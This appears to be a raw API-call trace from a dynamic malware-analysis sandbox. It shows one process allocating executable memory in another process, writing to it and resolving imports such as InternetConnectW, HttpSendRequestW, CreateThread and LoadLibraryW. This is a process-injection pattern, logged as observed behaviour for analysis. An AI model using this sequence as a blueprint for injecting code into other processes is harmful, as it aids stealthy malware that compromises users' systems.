	[0215.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.301] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0215.301] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.301] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.301] lstrlenA (lpString="InternetConnectW") returned 16
	[0215.301] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.302] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27496b6*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27496b6*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0215.302] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.302] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.302] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.302] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.303] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.303] ResetEvent (hEvent=0x548) returned 1
	[0215.303] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.303] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.303] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.304] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.304] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.304] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040d0, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.304] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.305] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.305] lstrlenA (lpString="InternetReadFile") returned 16
	[0215.305] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.305] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27496ca*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27496ca*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0215.305] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.305] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.305] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.306] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.306] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.306] ResetEvent (hEvent=0x548) returned 1
	[0215.306] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.307] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.307] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.307] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.307] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.307] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040d4, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.308] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.308] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.308] lstrlenA (lpString="HttpSendRequestW") returned 16
	[0215.308] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.308] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274968c*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274968c*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0215.309] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.309] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.309] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.309] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.309] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.310] ResetEvent (hEvent=0x548) returned 1
	[0215.310] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.310] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.310] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.310] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.310] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.310] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040d8, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.311] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.311] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.311] lstrlenA (lpString="InternetOpenW") returned 13
	[0215.311] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.311] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274967c*, nSize=0xe, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274967c*, lpNumberOfBytesWritten=0x128674*=0xe) returned 1
	[0215.312] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.312] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.312] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.312] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.313] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.313] ResetEvent (hEvent=0x548) returned 1
	[0215.313] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.313] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.313] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.314] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.314] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.314] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040dc, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.314] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.314] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.314] lstrlenA (lpString="InternetCloseHandle") returned 19
	[0215.314] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.315] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27496a0*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27496a0*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0215.315] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.315] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.315] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.315] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.316] ResetEvent (hEvent=0x548) returned 1
	[0215.316] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.316] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.316] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.316] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.316] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.316] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040e0, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.317] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.317] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.317] lstrlenA (lpString="HttpOpenRequestW") returned 16
	[0215.317] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.317] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749668*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749668*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0215.318] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.318] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.318] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.318] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.318] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.319] ResetEvent (hEvent=0x548) returned 1
	[0215.319] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.319] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.319] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.319] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.319] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.319] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040e4, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.320] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.320] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0215.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749978, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0215.320] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0215.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749978, cbMultiByte=-1, lpWideCharStr=0x2733188, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0215.320] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0215.320] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.320] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2733188*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2733188*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0215.320] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0215.320] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.320] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.321] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0215.321] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0215.321] ResetEvent (hEvent=0x548) returned 1
	[0215.321] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.322] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0215.322] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.322] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.322] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.322] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0215.322] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.322] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.322] lstrlenA (lpString="CloseHandle") returned 11
	[0215.322] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.322] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749906*, nSize=0xc, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749906*, lpNumberOfBytesWritten=0x128674*=0xc) returned 1
	[0215.323] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.323] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.323] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.323] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.323] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.324] ResetEvent (hEvent=0x548) returned 1
	[0215.324] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.324] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.324] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.324] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.324] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.324] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004008, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.325] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.325] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.325] lstrlenA (lpString="Process32FirstW") returned 15
	[0215.325] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.325] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27498f4*, nSize=0x10, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27498f4*, lpNumberOfBytesWritten=0x128674*=0x10) returned 1
	[0215.326] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.326] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.326] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.326] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.326] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.327] ResetEvent (hEvent=0x548) returned 1
	[0215.327] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.327] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.327] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.327] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.327] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000400c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.328] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.328] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.328] lstrlenA (lpString="CreateThread") returned 12
	[0215.328] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.328] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749914*, nSize=0xd, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749914*, lpNumberOfBytesWritten=0x128674*=0xd) returned 1
	[0215.328] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.329] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.329] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.329] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.329] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.329] ResetEvent (hEvent=0x548) returned 1
	[0215.329] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.374] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.374] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.374] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.374] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.375] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004010, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.375] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.375] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.375] lstrlenA (lpString="DeleteCriticalSection") returned 21
	[0215.375] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.376] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749924*, nSize=0x16, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749924*, lpNumberOfBytesWritten=0x128674*=0x16) returned 1
	[0215.376] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
